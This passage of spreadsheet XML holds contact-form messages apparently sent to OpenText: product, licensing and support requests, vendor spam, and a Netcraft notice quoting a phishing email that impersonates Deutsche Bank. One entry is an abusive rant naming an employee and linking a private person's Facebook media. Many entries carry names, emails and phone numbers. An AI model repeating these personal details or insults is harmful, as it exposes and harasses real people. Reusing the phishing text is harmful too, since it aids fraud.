I have tried calling, but I never get through.  Thanks!</t>
  </si>
  <si>
    <t>Opentext 360 for Microsoft Sharepoint. I found a web page about it but cannot find it in the downloads in my support. http://www.opentext.com/what-we-do/products/opentext-solutions-for-microsoft/opentext-blazon-for-microsoft-sharepoint  _x000D_
Please advise how to download or if it is not available any longer or if there is an alternative solution.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you doing great._x000D_
_x000D_
I hope you are the right person to discuss about updated Database from all the industries who might be interested in area of payments, securities , Cash Management and trade._x000D_
_x000D_
We have complete contact details of Chief financial officer, Finance Managers, CEO's from various organization (big,medium,small), Owner, VP/Director of the Organization, Sales Brokers, Mortgage brokers, Consultants, Entrepreneurs, Merchant Acquirers, Mortgage Professionals, Industry Associates, Advisors and all manner of key decision makers from different industries mentioned below who might be interested in your product and services._x000D_
_x000D_
We provide complete verified list for the marketing purposes i.e. Tele campaign or Email campaign. This is one time purchase and you would own the list for your unlimited and perpetual usage._x000D_
_x000D_
Kindly let me know your target criteria:_x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Thanking you in anticipation._x000D_
_x000D_
Regards,_x000D_
Edward Martin // Marketing Manager</t>
  </si>
  <si>
    <t>Looking to find out whether there is an OpenText solution that supports the placement of e-signatures. We are currently using CCE but I don't think it has that capability. Please send me an email with related information. Thanks.</t>
  </si>
  <si>
    <t>I'm part of the eDiscovery team for the Office of General Counsel at FCA.  We're looking for a collection tool and were wondering if your product does the following:_x000D_
Document Indexing_x000D_
Full Text Extraction_x000D_
Keyword Search_x000D_
Metadata Extraction_x000D_
Also, is the product web-based or installed and how many users can use it at a time._x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm a new employee at the firm and I will be responsible for maintaining version of Edocs DM version 10.00. Could I please have any and all information regarding this software? I'm sure anything that can help me learn more about this system would be invaluable. Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
_x000D_
I hope this message finds you well._x000D_
_x000D_
I won't take much of your time so let me go straight to my pitch._x000D_
_x000D_
I am asking for your support in form of a scholarship because I know I'm likely to be a perfect fit for you in the nearest future._x000D_
_x000D_
I have been accepted into the MEI (Masters of Entrepreneurship and Innovation) program in Queens University/Smith Business school Kingston, Ontario, Canada for the September 2017/2018 session._x000D_
_x000D_
I co-founded poontoe.com with my husband about 2yrs ago, an offshoot from an initial startup we founded in 2011 that got us selected among the top 20 in the Startup bootcamp Amsterdam selection process. _x000D_
_x000D_
I'm involved hands on in the daily running of the website; from tech to social media to content and this MEI is an opportunity of a lifetime. I believe it will help harness the latent skills I have and support and connect me with the men, materials and finances I need to establish this business._x000D_
_x000D_
I am a mother of three children that are already manifesting computer and creative skills; creating cartoon characters, designing comics and writing books._x000D_
_x000D_
I therefore believe that the knowledge I gain from this program will go a long way in establishing them._x000D_
_x000D_
Thank you for your time and I look forward to hearing from you._x000D_
_x000D_
Kind regards,_x000D_
Nancy_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Does iHUB F-Type still free ? i can't figure out how to download it from your web site </t>
  </si>
  <si>
    <t>DM continues to disappear from Ribbon Bar</t>
  </si>
  <si>
    <t>I want to register to have a support account but the form is coming back all the time telling there is an error but all fields are completed with valid information._x000D_
We want this account to ask for a running licence file for Redact IT as we have maintenance contract till the end of the year. As we lose already a lot of time with your not working forms, it becomes urgent for our users._x000D_
Best regards</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
I am a buyer in IT Procurement Department of the Audi Group established in Ingolstadt, Germany. _x000D_
_x000D_
Regarding a project of Audi Marketing Database Management we want to kindly invite you as a potential supplier to the tender._x000D_
_x000D_
In order to send you an official invitation we need you to register on our supplier platform of the VW group. _x000D_
_x000D_
If you are interested, please click the link: _x000D_
http://www.vwgroupsupply.com  and follow the steps online._x000D_
_x000D_
If you do not want to participate in the tender, please kindly send me a short refusal._x000D_
_x000D_
For any questions of the registration, you can either call the hotline or contact me._x000D_
_x000D_
I am looking forward to meeting you onboard!_x000D_
_x000D_
Thank you and best regards!_x000D_
Wei Yu</t>
  </si>
  <si>
    <t>I came across your website after searching for new companies on Google._x000D_
_x000D_
And I was wondering if you would like to partner up? _x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your service online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second animated explainer video for your service for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more and get started at www.30secondexplainervideos.com/explainer-promo_x000D_
_x000D_
Or can you shoot me a quick email for a brief discussion!_x000D_
_x000D_
Cheers, Travis Cole_x000D_
www.30secondexplainervideos.com/explainer-promo</t>
  </si>
  <si>
    <t>Alchemy Search license issue. I had to restore the Alchemy server that we have within our Scarborough site, this is now struggling to see the license server. I have tried to use the Alchemy License Manager program to re-apply our license key and this is failing. The original serial number was S005-37692-636 but online activation is failing, has this site been taken down now as this is an old product or is there a problem with our current serial number?_x000D_
Thank you_x000D_
David</t>
  </si>
  <si>
    <t>Hi there,_x000D_
 _x000D_
We are currently exploring the setup of an enterprise level Document Management System._x000D_
 _x000D_
The intent is to have an institutional repository for our documents which will help enable secured (and fast) document upload, indexing and searching._x000D_
  _x000D_
I would like to link up with your Singapore sales rep for a discussion on this project._x000D_
_x000D_
Thank you._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Lee Chye Seng_x000D_
Director  l  Learning Systems and Applications_x000D_
 _x000D_
 _x000D_
 _x000D_
Singapore University of Social Sciences_x000D_
(formerly known as SIM University)_x000D_
 _x000D_
461 Clementi Road, Singapore 599491_x000D_
t +65 62480152 l www.suss.edu.sg</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We see that BIRT has a program specifically targeting developers. Catchy is a specialist agency, we help our clients to create, build and grow developer programs. _x000D_
 _x000D_
We'd love to talk to you about a possible collaboration, would you be open to a brief introductory call?_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Richard Hurring_x000D_
CEO_x000D_
www.catchyagency.com</t>
  </si>
  <si>
    <t>Please can I be sent a list of all licences and who holds them for AFP viewer, AFP compare and OpenText Exstream.</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I'm currently working on a big project which require to convert a huge amount of PDF files (around 250.000 per month) in order to apply our algorithm on it._x000D_
Can you send me a presentation of the product which is more suitable for me, and maybe an evaluation version ?_x000D_
_x000D_
Best Regards,_x000D_
Mathieu Kintzinger_x000D_
Data Guardian_x000D_
Clearstream Luxembourg</t>
  </si>
  <si>
    <t xml:space="preserve">突然のご連絡失礼いたします。_x000D_
株式会社MS-Japanの多田と申します。_x000D_
_x000D_
この度、貴社のFinance, Legal分野のエグゼクティブ層の採用に関して_x000D_
弊社から是非お力添えさせていただきたくご連絡いたしました。_x000D_
_x000D_
弊社は、今期で28期目となる老舗人材紹介会社でございます。_x000D_
特徴としましては、経理財務・人事総務・法務等の管理部門に_x000D_
専門特化した人材をご紹介しております。_x000D_
_x000D_
&lt;&lt;弊社ホームページ&gt;&gt;_x000D_
http://www.jmsc.co.jp/index.html_x000D_
※この分野では国内最大手のエージェントでございます。_x000D_
_x000D_
_x000D_
現在、管理部門の人材で何かお困りのことがございましたら_x000D_
管理部門におけるトップエージェントとして、_x000D_
精一杯お力添えさせていただきたいと考えております。_x000D_
_x000D_
是非一度、ご連絡を頂ければ幸いでございます。_x000D_
どうぞよろしくお願いいたします。 </t>
  </si>
  <si>
    <t>Looking for OCR solution for Cash Application at a major B2B Telecom Client where Open Text is already deployed for Mail room processes.</t>
  </si>
  <si>
    <t>West Point Properties Development Limited,a company incorporated in Kenya is seeking funding to develop a middle-class housing estate in Nairobi._x000D_
_x000D_
Attached herein,please find our business proposal/plan with information on financial flows._x000D_
_x000D_
We welcome your comments on the same._x000D_
_x000D_
_x000D_
_x000D_
Kindest regards,_x000D_
_x000D_
Nicholas Ng'ang'a_x000D_
Managing Director_x000D_
West Point Properties Development Limited_x000D_
P.O Box 3305_x000D_
Nakuru_x000D_
Kenya._x000D_
Email: wppd64@gmail.com_x000D_
Phone: + 254 770 148 751</t>
  </si>
  <si>
    <t xml:space="preserve">Following a successful participation in the past Thai census, our company, Teletrol-One, is now interested in learning which products your company could propose and supply for OCR processing of forms in the upcoming census in Thailand._x000D_
Please forward relevant brochures and datasheets, (census) references as well as price information and information about cooperation for the case on hand._x000D_
</t>
  </si>
  <si>
    <t>Training for system administrators.  Third party licensee is suggesting that no such training exists and I would like to determine how accurate such a perception is?  If classes exist, please share their titles and frequency with which they are held.</t>
  </si>
  <si>
    <t>Our previous IT Director Sam Woo left over a year ago. I need access to the online administrator portal. Please help</t>
  </si>
  <si>
    <t xml:space="preserve">I need a login for QRS/ GXS. </t>
  </si>
  <si>
    <t xml:space="preserve">We are a Avolve ProjectDox Customer, which uses the Brava! AcitveX and HTML5 Viewers. I would like to get documentation and knowledge base info about Parameters and features for these projects. </t>
  </si>
  <si>
    <t xml:space="preserve">Can't logon to retail link . Can you reset my password. </t>
  </si>
  <si>
    <t>Digital Asset Management for SAP</t>
  </si>
  <si>
    <t>per Dillards EDI manager, requesting test data; test 850 po. _x000D_
please advise how to start the process.</t>
  </si>
  <si>
    <t>I am evaluating a commercial EMR system (Flatiron OncoEMR) and they indicated OpenText RightFax is the integrated fax solution for INBOUND faxes for their system. I am trying to get a cost per fax estimate so that I can compare the monthly charges relative to what we pay now.</t>
  </si>
  <si>
    <t xml:space="preserve">Content Suite Platform pricing </t>
  </si>
  <si>
    <t>FirstClass Pricing</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
This is Stephen Hunt. The reason of my email is to check whether you would be interested in acquiring contact details of Human resources industry._x000D_
_x000D_
We have the complete contact details and verified email addresses of Human resources director/manager, Staff training and development manager/director, Personnel training and development manager/director, Recruiting director/manager, Director pay and benefits, Manager human resources, E-Commerce Recruiter – HR. Coordinator, Human Resources and Safety Coordinator and all manner of people from various industries who might be interested in your product/services._x000D_
_x000D_
Industries covered: Finance, Healthcare, Information Technology, Hospitality, Education, Law firms, Mining, Oil and Gas, Waste Water management , Energy &amp; Utility, Transportation, Manufacturing, Insurance, E-commerce, FMCG and many more._x000D_
_x000D_
Kindly let me know your target criteria so that we can provide you exact counts, cost and few free samples._x000D_
_x000D_
Target Industry: _x000D_
Target Geography: _x000D_
Target Job Title:_x000D_
_x000D_
Thank you for your time in advance._x000D_
_x000D_
Best Regards,_x000D_
Stephen Hunt_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>I cannot download the software (Brava! Desktop TXL, standalone license).  The links in the instruction email you sent do not take me to the described links in the instructions.  I created an account, but there is no place to download the license key or the software.  The email looks like the old IGC instructions, but they don't work for your site.</t>
  </si>
  <si>
    <t xml:space="preserve">are the following items still available?_x000D_
_x000D_
P/N: S-EXMPI550101M-1_x000D_
DESCRIPTION: SOFTWARE EXCEED LICENSES_x000D_
_x000D_
P/N: EU0004560-22033-VA-US_x000D_
DESCRIPTION: SOFTWARE OPENTEX ECM RENEWAL_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Trying to get documentation on metadata. Our company was formerly known as McGaldrey, fellow employee that can be looked up is Jon Fletcher. I have been working with Paul Goodman and he gave me some url but it seems my account does not have full access to MySupport. I need full access to MySupport.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, _x000D_
_x000D_
Good morning and I hope this email finds you well. _x000D_
_x000D_
My name is Emily Ackerman and I’m with CBS Radio in Dallas, Texas. I wanted to reach out and introduce myself since I believe your company would be a great fit for many of our marketing opportunities within CBS Radio, especially our digital assets for targeting qualified new customers, life style events for branding, and potentially one of our radio stations. _x000D_
_x000D_
I would love to chat with you to discuss how you are currently marketing the company as well as run some ideas by you about some digital platforms / events we have on the horizon in DFW. Are you available one day next week or the following week for us to chat for 15 – 20 minutes? Let me know what works best with your schedule and I look forward to your response._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">OPenTXT correspondence management framework, best practices information  </t>
  </si>
  <si>
    <t>New Documetum license quote</t>
  </si>
  <si>
    <t>Request for Information on a Performance Management System, referred by F. Martin Rookard of WSSC</t>
  </si>
  <si>
    <t>Invoice Payment Setup-I'm taking over responsibilities from Dena Campasano.  How do I pay invoice #1706864964 using my credit card?</t>
  </si>
  <si>
    <t>Want information on Opentext Information Management</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
My name is Chris Power and I'm the author of the upcoming book: Take the Lead by Leaving your Ego Behind and I'm contacting you as part of my research to boost the Toronto based leadership content. I would like to arrange a 20-minute interview (in person, Skype, or telephone) with Mr. Mark Barrenechea to ask some general questions about leadership to be included in the book._x000D_
_x000D_
The questions are below:_x000D_
_x000D_
1. Based on your experience, what are 3 Key things leaders should know (i.e. about themselves, about others, about their organization, about life) that would help them be a more effective leader?_x000D_
_x000D_
2. In your opinion what are 3 things a leader can do ( i.e. Team building, work-life balance, learning from others) to be a more effective leader?_x000D_
I do not have a firm deadline at this time but an interview by the end of next week would be ideal._x000D_
_x000D_
Thank you very much for your time,_x000D_
_x000D_
Chris Power_x000D_
Author of Take the Lead by Leaving Your Ego Behind_x000D_
10 Secrets Guaranteed to Make You a Better Leader at Work and in Life_x000D_
chrispower.nl@gmail.com_x000D_
613-878-6509</t>
  </si>
  <si>
    <t>trying to update the gps.</t>
  </si>
  <si>
    <t>I would like to upgrade our fax server to a newer version. We did move our mailing system to Gmail and our old fax is not working well with it._x000D_
_x000D_
Thanks_x000D_
Adrien</t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
I have a question about the cost of license for Brava Desktop CXL: is the license permanent or do I have to pay 145$ every year? _x000D_
Regards,_x000D_
Szymon</t>
  </si>
  <si>
    <t>Looking for a QMS with the main purpose of electronic file management/approval/version control, across the areas of CAPAs, Training Records, SOPs.</t>
  </si>
  <si>
    <t>I am needing to get costs for budgeting purposes.</t>
  </si>
  <si>
    <t>Need to help to learn live link in practically</t>
  </si>
  <si>
    <t>I am looking for the email address of your telco manager in relation to a TATA account still in the name of Xpedite Systems.   I would appreciate the telco manager could send me an email so I can explain.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Zuge einer Projektarbeit der Hochschule für angewandte Wissenschaften Würzburg-Schweinfurt soll mein Projektteam und ich einen Toolvergleich von BPMN 2.0-Modellierungstools durchführen, um das beste Werkzeug zur Modellierung aller Prozesse der FHWS auszuwählen. Mit diesem soll in der Zukunft das Prozessportal der Hochschule gepflegt werden. Ich würde mich freuen, wenn Sie mir bitte eine Mail-Adresse zur Verfügung stellen würden, an die ich einen kleinen Fragebogen senden könnte._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Christoph Tomitza</t>
  </si>
  <si>
    <t>Good day_x000D_
_x000D_
I am a Quantity Surveyor (Cost Engineer) in construction and in need of software to help me measure areas and lengths from electronic drawings (Usually in PDF or DWG format) Would this software be suitable for this purpose and which of your products would you suggest ?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Morning, _x000D_
_x000D_
We manage IT for a client who has requested a PDF/CAD annotation and creator package.  Would it be possible to get volume licensing prices for 10-19 and 20-49 users for the CXL SKU?_x000D_
_x000D_
Any help or additional information would be appreciated._x000D_
_x000D_
Regards_x000D_
Ross </t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We are sending out an RFQ for document management system and I would like to get in touch with a sales person for this matter._x000D_
_x000D_
BR, _x000D_
Serina Nilsson_x000D_
Infratek AS</t>
  </si>
  <si>
    <t xml:space="preserve">Estimation for price licence to deploy SAP Document Archiving Open Text </t>
  </si>
  <si>
    <t>We're orientating on a document control system. I'm wondering if Open Text is compatible with IBM Lotus Notes?</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for software jobs in Canada.I have11years experience in software development,and qa lead </t>
  </si>
  <si>
    <t>Hi,_x000D_
I am interested in understanding how iHub can be used as an OEM for the product offered by my organization. I am interested in building a reporting and analytics module for the product._x000D_
Please speak to me for further details._x000D_
_x000D_
Thanks and regards,_x000D_
Sanjuktha</t>
  </si>
  <si>
    <t>We are interested in an electronic Trial Master File to be used in our Medical Department for CLinical Trials.</t>
  </si>
  <si>
    <t>Partners in Egypt to send RFQ</t>
  </si>
  <si>
    <t>sadasdasdasd</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
 _x000D_
Après étude de votre site, nous constatons que vous avez des mots clés très intéressants qui stagnent en deuxième et fin de première page._x000D_
 _x000D_
Nous avons un client dans une grande ville française qui est dans un secteur d'activité connexe au votre et il est dans le top de 3 de Google sur les principales requêtes. _x000D_
(voir des exemples clients à la fin du message) _x000D_
 _x000D_
C’est bien d’être positionné dans les 3 premières pages car vous pouvez monter en première page assez rapidement._x000D_
 _x000D_
Pour atteindre  le top 3 de Google vous devez appliquer des méthodes de netlinking qui apportent plus de jus à votre site._x000D_
 _x000D_
Les annuaires, les communiqués de presse, les commentaires sur les forums permettaient dans les années 2013 de monter en positionnement, mais ce temps est  révolu._x000D_
 _x000D_
Nous sommes sous-traitants pour les agences web européennes et canadiennes, par conséquent nous connaissons les différentes méthodes de référencement et nous savons exactement ce qui fonctionne et ce qui ne fonctionne plus._x000D_
 _x000D_
Actuellement il n’y a qu’un netlinking qui est bien noté par Google et qui apporte des résultats très satisfaisants pour monter dans le top 3:_x000D_
 _x000D_
c’est le netlinking 100% articles de blog._x000D_
 _x000D_
Nos équipes rentrent en contact avec des milliers de blogueurs tous les mois dans des thématiques très variées pour publier des articles de 400-500 mots avec des ancrages qui pointent sur le site à référencer._x000D_
 _x000D_
Ce netlinking à très forte valeur ajoutée vous est facturé par nous entre 3 et 5 fois moins qu’une agence française._x000D_
 _x000D_
Notre agence est spécialisée dans le référencement naturel ultra concurrentiel,_x000D_
_x000D_
Nos clients sont en 1ère page Google sur des mots ultra concurrentiels_x000D_
_x000D_
Voici des exemples clients en 1ère page sur : _x000D_
_x000D_
“plombier paris”  ( le CPC sur Adwords peut monter à 160€ le clic )_x000D_
_x000D_
“serrurier paris” ( le CPC sur Adwords peut monter à 150€ le clic )_x000D_
_x000D_
“chauffagiste paris” ( le CPC sur Adwords peut monter à 120€ le clic )_x000D_
_x000D_
“vitrier paris” ( le CPC</t>
  </si>
  <si>
    <t>We are one of the largest SI in India._x000D_
_x000D_
One of our esteemed customer is planning to procure 5 licenses each of EXCEED V15 WITH AMC and  EXCEED FREEDOM LICENCE WITH AMC._x000D_
_x000D_
Kindly let us know our best possible transfer prices and easiest procurement process for the same.</t>
  </si>
  <si>
    <t>Please introduce us to a partner in Egypt to whom we can send request for quotation</t>
  </si>
  <si>
    <t>Share the types of licence and pricing for business. Also I need to know if there is integration with an external UI (Webservice) is possible or not? Thanks.</t>
  </si>
  <si>
    <t>Require price for a Rightfax solution to integrate into Cisco Unity Connection for 3000 users but scalable to 5000 users.</t>
  </si>
  <si>
    <t>We are one of the leading SAP SuccessFactors partners and we are keen to explore partnership with OpenText. Our focus is on Employee Central and payroll, and OpenText would fit well within our portfolio of service offerings. Additionally, we may be able to create license/subscription opportunities for OpenText.</t>
  </si>
  <si>
    <t>invitation code for tradinggrid.gxs.com</t>
  </si>
  <si>
    <t>I would like a whitepaper on the Open Text Execute 360 product.  I would also like to know if you have a contact person at USPTO regarding this product.  I want to make sure that I am using the correct communication channel.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the very beginning stages of considering implementing a document management system for our worldwide legal department.  </t>
  </si>
  <si>
    <t>Interested in demo of Documentum</t>
  </si>
  <si>
    <t>I NEED TO BUY IMAGING FOR WINDOWS</t>
  </si>
  <si>
    <t xml:space="preserve"> We are getting error messages when trying to send faxs. Can you please give us a call or let us know when our service will work? We have no ability to send a fax right now. Thank you</t>
  </si>
  <si>
    <t>Estimados._x000D_
Estamos evaluando implementar un soft de gestión documental que cumpla con las normativas vigentes para la Industria Farmacéutica._x000D_
Nos gustaría que nos presenten el Documentum para evaluar su implementación._x000D_
En caso de ser posible, por favor responderme vía mail._x000D_
Muchas gracias.</t>
  </si>
  <si>
    <t>Nel is a big ASSHOLE. Complaints have been filed against him but the HR did nothing. Great, loyal employees were forced to leave because of this horrible being. I don't want to work for this foul creature and everyone licking his ass._x000D_
_x000D_
Opentext (GSX) used to be a very pleasant place to work._x000D_
_x000D_
Also, another reason why this company is becoming a joke are terrible people like these: https://www.facebook.com/madelaine.lamarca/media_set?set=a.1512489232115300.1073741945.100000627130200&amp;type=3</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am using the latest FirstClass Desktop edition. I am using Windows 10. How do I set color of a thread from a keyboard shortcut? For example, let's say I got an email that says "Urgent, please read!"... I would like to do something like press "Ctrl + R", and that would change the color of that thread to red. Something like "Ctrl + G" should change the color to green. Please let me know, how I can achieve this. Thanks. </t>
  </si>
  <si>
    <t>HELLO, I AM PROCESSING AN APPLICATION FOR ORICA SUPPLY.  ON THE ABOVE COMPANY. THANK YOU</t>
  </si>
  <si>
    <t>I have used Brava at my previous job for many years. My new employer with not install even the free reader and drawing viewer. Is it possible to install on a thumb drive so that I can use Brava reader and Drawing viewer?   I did check a portableapps with no luck._x000D_
Thanks_x000D_
Rudolph Glenn Geiger_x000D_
rglenngeiger@gmail.com</t>
  </si>
  <si>
    <t>we are retiring our Vignette Content Management and Vignette Application Portal systems and are looking for ways to archive this content.  Please contact us if any tools, resources, or guidance you can provide.</t>
  </si>
  <si>
    <t>We're on VIM v7 sp2 under Sustaining Maintenance does the date of December 2017 mean we should upgrade to v7.5 by that date or could we continue to run v7 until we're ready to upgrade which may be after December ?_x000D_
Thanks Keith</t>
  </si>
  <si>
    <t>ACM - ICPC Barcelona Programming Bootcamp 2017 Partnership Opportunities_x000D_
_x000D_
To Whom It May Concern,_x000D_
 _x000D_
We are looking for your support of the upcoming 2nd Hello Barcelona ACM-ICPC Bootcamp that will take place in Barcelona from the 27th of September until the 5th of October 2017._x000D_
 http://in.harbour.space/icpc/acm-icpc-hello-barcelona-bootcamp-autumn-2017/_x000D_
_x000D_
The ACM International Collegiate Programming Contest (ICPC) is the premiere global programming competition conducted by and for the world’s universities._x000D_
 _x000D_
For nearly four decades, the ICPC has grown to be a game changing global competitive educational program that has raised aspirations and performance of generations of the world’s problem solvers in the computing sciences and engineering._x000D_
 _x000D_
Quite simply, it is the oldest, largest, and most prestigious programming contest in the world._x000D_
 _x000D_
Hello Barcelona ACM-ICPC Bootcamp 2017 will bring to Europe the coaches of the famed “Moscow Workshops ACM-ICPC” who trained 8 of the 13 world finalists in the 2016 ACM-ICPC contest._x000D_
 _x000D_
The first event was held in collaboration with Kaspersky Labs, one of the leading cyber security companies in the world, and Codeforces, the world’s largest online competitive programming community. Gathering students from 20 world leading universities such as Cornell University, École Normale Supérieure, Tsinghua University, Saint Petersburg State University, Northern Western University, University Polytechnic Catalunya and University of Tokyo to name a few, as well as over ten thousand programmers registered on Codeforces that competed online.  _x000D_
 _x000D_
“Hello Barcelona Bootcamp participants are not just talented students that win competitive programming competitions, they are some of the hardest working and most brilliant minds of the ongoing digital revolution. We cannot really anticipate the full impact they will have,” said Mike Mirzayanov, Founder and CEO, at Codeforces._x000D_
 _x000D_
Former ACM-ICPC finalists have made remarkable contribution</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am reaching out to check whether you have any requirements of database of Wireless Communication industry professionals mentioned below:_x000D_
_x000D_
VP telecommunication, Tower owners, Network administrator, Network engineer, Network architect, Network manager, Wireless network engineer, Telecommunications manager or specialist, Wireless Systems Engineer, Design engineer, Computer engineer,  Hardware design engineer and Application engineer, Service Providers, Engineering / Consulting, Public Safety and many more._x000D_
_x000D_
Industry: Private utilities, Other motor freight/fleet services, Aviation/aerospace, Security, Construction, Manufacturing, Facilities management, Education, Retail, Travel/hospitality, Hospitals._x000D_
_x000D_
Kindly revert back with your needs such as Target industry, Target job titles, Target geography. So that we can provide you more details i.e. counts, samples, pricing, etc._x000D_
_x000D_
Look forward to hear from you._x000D_
_x000D_
Regards,_x000D_
Lisa Martin_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t>Looking into Composer Notes as a possible solution to convert off a few major web apps I wrote in Lotus Notes.</t>
  </si>
  <si>
    <t>Hi All,_x000D_
_x000D_
Camelot Group has run the UK National Lottery since 1994.  We have been reviewing how we use processes within the organisation and how we can demonstrate the right level of oversight and control within those processes.  The integrity of our processes is paramount as errors can lead to life changing issues for us and our players.  We are regulated by the Gambling Commission in the UK._x000D_
_x000D_
Through our review we have determined we need a 'tool' to support our business.  The 'tool' needs to do two broad things:_x000D_
1) Business Process Management - a tool to document, store and manage our processes._x000D_
2) Workflow capability linked to the processes to demonstrate adherence to processes._x000D_
_x000D_
We are looking for the right organisations to submit an RFP to find the partner that best suits our needs.  Your organisation has been identified as a potential supplier._x000D_
_x000D_
If you think you may be I would like to have a quick chat with you to flesh out our requirements a little more and explain our process.  If you could suggest a date and time for a conversation I will book us in._x000D_
_x000D_
Many thanks._x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>We are a part of Global Imaging, a Xerox company. We have a few clients who are faxing so much, it seems a fax server appliance would server them better than the built in fax services of our Xerox MFDs. We are interested in the RightFax Express appliance to handle 2-4 lines of faxing. Also, we're curious about the EIP integration with the MFDs. Is there an extra cost associated with EIP integration? The simple SMTP method may suit us fine. Can we have prices? How does ordering work for us?</t>
  </si>
  <si>
    <t>Hello, Interested in better understanding opentext platform. We are interested in expanding customer communication capabilities within secure transmission security requirements, including omnichannel claims communications. Noticed you are part of Guidewire partners. We are an outsourcing TPA of auto and property claims._x000D_
_x000D_
Thanks_x000D_
Andre</t>
  </si>
  <si>
    <t>would like to eliminate fax machines on premises and would like to know what solution you have to offer.</t>
  </si>
  <si>
    <t>Hello,_x000D_
One of our clients is really interested in the OpenText Content Suite and it's features._x000D_
He would like to know if the solution can also locate a physical file whether it's in the fileroom or in offsite storage._x000D_
He would like also to have an idea on the price of the solution, and if there're a possibility to organise a meeting with your commercial representative in Morocco to get a close look at the solution and it's features._x000D_
Eagered to hear back from you._x000D_
Regards,</t>
  </si>
  <si>
    <t>I am contacting you on behalf of the Marketing and Sales Team of Covestro Deutschland AG in regards of an evaluation market research I am currently performing. I am really interested in learning more about OpenText, therefore I would like to ask if it is possible to schedule a meeting or a call where me and my team could learn more about your company, supply chain solutions and also discuss some of our challenges with you. That would be really helpful for us. _x000D_
I look forward to receiving your reply._x000D_
Best regards,_x000D_
Violeta Vasileva</t>
  </si>
  <si>
    <t>We need information for some course related to Documentum and xCP</t>
  </si>
  <si>
    <t>We are interested in learning about opportunities to join the OpenText ecosystem as a business partner, leveraging our cloud-based platform for WFO initiatives.</t>
  </si>
  <si>
    <t>Bonjour, j'aimerai prendre connaissance de votre outil de dématérialisation et de rapprochement (avec des PO) des factures fournisseur. n'hésitez pas à me contacter. Merci</t>
  </si>
  <si>
    <t>Canon norway have support contract (DOKustar partner), but It's not possible for me to add a ticket in my support.</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello and good morning_x000D_
_x000D_
I am Katie Smith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Katie Smith</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
This e-mail is to notify you of a mail account being used fraudulently:_x000D_
_x000D_
R-6-270213-84513696-2-1-DE1-57734466@tmr3.com_x000D_
_x000D_
This attack targets our customer, Deutsche Bank, website URL http://www.db.com._x000D_
_x000D_
Please close down this e-mail account as soon as possible, as the attack is currently operational._x000D_
_x000D_
The email received is provided below this message. We have been informed by Deutsche Bank that they did not send this message._x000D_
_x000D_
Regards,_x000D_
_x000D_
Netcraft_x000D_
_x000D_
Phone: +44(0)1225 447500_x000D_
Fax: +44(0)1225 448600 _x000D_
_x000D_
-----Original Message-----_x000D_
From: Deutsche Bank AG [mailto:R-6-270213-84513696-2-1-DE1-57734466@tmr3.com] _x000D_
Sent: jeudi 8 juin 2017 15:48_x000D_
To: .EFGZ-GE OTC Options_x000D_
Subject: Confirmation_x000D_
from :  Deutsche Bank AG_x000D_
to   :  EFG BANK AG_x000D_
attn.:  settlement department_x000D_
our ref.   : 01219136804/ 1858937451    your ref.:_x000D_
agreed price trade_x000D_
XOFF / ausserboerslich_x000D_
we confirm our sale by order and for account of:_x000D_
EFG Bank AG_x000D_
EFG Privat Banque SA                 CH-8001 Zuerich_x000D_
6,5% DT.BANK AKT.ANL.17(18)RWE_x000D_
 8.6.    18_x000D_
sec.code               : DM3RYD                  isin : DE000DM3RYD2_x000D_
t/d                    : 06.06.2017              s/d  : 08.06.2017_x000D_
nominal / no. of shares:          237.000,00000 trade ccy :   EUR pay ccy : EUR_x000D_
price/yield            :               97,5500000000_x000D_
principal              :          231.193,50     trade time:  13:32_x000D_
total consideration EUR:          231.193,50_x000D_
settlement : delivery vs. payment_x000D_
delivery : your DEUTSCHE KASSENVEREIN AG                             7259000_x000D_
BNP PARIBAS SECURITIES SERVICES    60327 FRANKFURT AM MAIN_x000D_
Our:   DEUTSCHE KASSENVEREIN AG                                 736300000000_x000D_
DEUTSCHE BANK AG, FRANKFURT AM MAINDEUTDEFFGME_x000D_
ACC. 7363000                       DEUTDEFFGME_x000D_
Please call us to notify us of any discrepancies in the above settlement statement. If we do not hear to the contrary within 24 hours we will assume your agreement with the details of this settlement sta</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir interessieren uns für Ihr CMS "OpenText Web Site Management (RedDot)" mit allen Komponenten und Ihre dazugehörigen Cloud und Managed Services. _x000D_
_x000D_
Bitte senden Sie uns ausführliches Informationsmaterial und Produktbeschreibungen per E-Mail zu:_x000D_
_x000D_
1.	CMS mit allen Komponenten: _x000D_
